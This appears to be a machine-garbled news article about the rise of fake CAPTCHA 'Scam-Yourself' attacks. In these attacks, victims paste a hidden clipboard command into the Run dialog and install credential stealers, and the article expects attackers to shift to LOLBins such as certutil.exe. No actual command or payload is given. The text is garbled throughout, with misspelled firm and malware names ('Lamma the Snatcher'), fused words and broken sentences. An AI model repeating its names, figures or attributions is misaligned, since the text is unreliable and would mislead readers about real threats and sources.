New option social engineering attack Security experts have warned that the use of fake CAPTCHA pages to defraud victims has risen sharply over the past few months.
Recent Analysis from cyber experts Reliaquest revealed that criminals used fraudulent CAPTCHA pages that imitate trusted services such as Google and Cloudflare to trick users into running malicious scripts on their computers.
Although the campaign was first noticed in September, Reliaquest noted that from October to early December 2024, its clients saw a number fake captcha the number of websites has almost doubled from the levels seen in September.
The firm suggested that this was likely the result of attackers sharing templates for fake web pages other cybercriminals.
“This spike is likely the result of researchers releasing the templates used for these campaigns, which inadvertently provided more attackers with the tools to easily repeat these tactics.”
The report highlights advanced threat groups such as APT28 (Fancy Bear) associated with Russian militaryused this technique, citing an investigation by Ukraine’s national cyber defense team into the use of APT28 fake CAPTCHA pages.
“A recent investigation by the Computer Emergency Response Service of Ukraine (CERT-UA) revealed APT28 used fake CAPTCHA systems to infiltrate local authorities,” Reliakquest added.
“By imitating reCAPTCHA interfaces, they tricked users into executing commands that downloaded malicious scripts. These scripts are capable of installing Secure shell (SSH) tunnels and data leakage, highlighting the simplicity and effectiveness of the attack.”
Evolution of fake CAPTCHA attacks poses ‘significant risk’
Reliaquest described the attack chain used in these attacks as “deceptively simple”, in which visitors to hacked websites are redirected to a fake site. Captcha page.
But instead of the usual “click on images of intersections” or retype a confusing series of letters, the user is asked to open the “Run” line and paste a command, which is hiddenly copied to the clipboard when visiting the site.
This malicious command causes installation malwareusually a credential thief such as Lamma the Snatcher.
Security researchers have called this approach where victims perform malicious commands yourself when attacked by “Scam-Yourself”.
Security provider Gen Digital said it found a significant increase in these types of attacks by the end of 2024, recording a 614% increase quarter-on-quarter in the third quarter of 2024, concluding that “social engineering, psychological Manipulative tactics continue to be one of the most dangerous tools in the cybercriminals’ arsenal.”
report added that during the same period, it protected more than 2 million users from the fake CAPTCHA variant of these “Scam-Yourself” attacks.
Reliquest warned that hackers will continue to refine their CAPTCHA attacks, making them harder to detect. The firm also predicts that the addition of alternative execution methods will pose a “significant risk” to organizations in the near future.
“Over the next three months, we expect improvements in fake CAPTCHA. infection vectorfor example, using alternative execution methods that do not use PowerShell commands,” he explained.
“This may involve using other LOLBins, such as forfiles.exe or certutil.exe, to load the initial stage in order to bypass existing detection measures.”